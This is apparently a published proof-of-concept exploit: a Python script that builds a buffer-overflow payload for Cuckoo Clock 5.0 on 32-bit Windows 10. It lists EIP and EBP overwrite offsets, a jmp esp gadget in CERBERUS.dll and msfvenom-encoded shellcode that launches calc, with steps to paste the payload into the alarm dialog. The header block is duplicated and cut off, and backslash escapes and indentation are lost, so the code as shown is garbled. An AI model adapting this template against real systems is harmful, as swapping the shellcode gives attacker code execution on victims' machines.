# Exploit Title: Cuckoo Clock 5.0 - Buffer Overflow
# Exploit Author: boku
# Date: 2020-02-14
# Vendor Homepage: https://en.softonic.com/author/pxcompany
# Software Link: https:/ # Exploit Title: Cuckoo Clock 5.0 - Buffer Overflow
# Exploit Author: boku
# Date: 2020-02-14
# Vendor Homepage: https://en.softonic.com/author/pxcompany
# Software Link: https://en.softonic.com/download/parallaxis-cuckoo-clock/windows/post-download
# Version: 5.0
# Tested On: Windows 10 (32-bit)
#
# Recreate:
# 1) Install & Open Cuckoo Clock v5.0
# 2) Right Click app icon (bottom right), click Alarms
# 3) Click the Add Button
# 4) Run Python script
# 5) Open generated poc.txt, then select-all & copy-all
# 6) Under Schedule, select-all in 'New Alarm' textbox, then paste buffer
# 7) Press Back Button and shellcode will execute

# EIP Overwrite at 260 Bytes
# Max Buffer space is 1287 bytes
# ESP points to payload at offset 264 bytes
# EBP overwrite at 256 bytes

# badChars = 'x00x0d'

try:
ebpOffset = 'x41'*256
ebp = 'x42x42x42x42'
eip = 'x16x05x03x10' # 0x10030516 : jmp esp | ascii {PAGE_EXECUTE_READWRITE} [CERBERUS.dll]
# ASLR: False, Rebase: False, SafeSEH: False (C:Program FilesParallaxis Cuckoo ClockCERBERUS.dll)
# ESP points to payload at offset 264 bytes
# 1019 bytes = Remaining Buffer Length
fixStack = 'x89xE5' # mov ebp,esp
fixStack += 'x83xECx30' # sub esp,byte +0x30
# root@kali# msfvenom -p windows/exec CMD=calc -b 'x00x0d' -f python -v shellcode
# x86/shikata_ga_nai chosen with final size 216
shellcode = b""
shellcode += b"xddxc3xbbx9ax4dx57xfaxd9x74x24xf4"
shellcode += b"x58x33xc9xb1x30x83xe8xfcx31x58x14"
shellcode += b"x03x58x8exafxa2x06x46xadx4dxf7x96"
shellcode += b"xd2xc4x12xa7xd2xb3x57x97xe2xb0x3a"
shellcode += b"x1bx88x95xaexa8xfcx31xc0x19x4ax64"
shellcode += b"xefx9axe7x54x6ex18xfax88x50x21x35"
shellcode += b"xddx91x66x28x2cxc3x3fx26x83xf4x34"
shellcode += b"x72x18x7ex06x92x18x63xdex95x09x32"
shellcode += b"x55xccx89xb4xbax64x80xaexdfx41x5a"
shellcode += b"x44x2bx3dx5dx8cx62xbexf2xf1x4bx4d"
shellcode += b"x0ax35x6bxaex79x4fx88x53x7ax94xf3"
shellcode += b"x8fx0fx0fx53x5bxb7xebx62x88x2ex7f"
shellcode += b"x68x65x24x27x6cx78xe9x53x88xf1x0c"
shellcode += b"xb4x19x41x2bx10x42x11x52x01x2exf4"
shellcode += b"x6bx51x91xa9xc9x19x3fxbdx63x40x55"
shellcode += b"x40xf1xfex1bx42x09x01x0bx2bx38x8a"
shellcode += b"xc4x2cxc5x59xa1xc3x8fxc0x83x4bx56"
shellcode += b"x91x96x11x69x4fxd4x2fxeax7axa4xcb"
shellcode += b"xf2x0exa1x90xb4xe3xdbx89x50x04x48"
shellcode += b"xa9x70x67x0fx39x18x68"
Remainder = 'x46'*(1287-len(ebpOffset+ebp+eip+fixStack+shellcode))
payload = ebpOffset+ebp+eip+fixStack+shellcode+Remainder
File = 'poc.txt'
f = open(File, 'w')
f.write(payload)
f.close()
print File + " created successfully"
except:
print File + ' failed to create'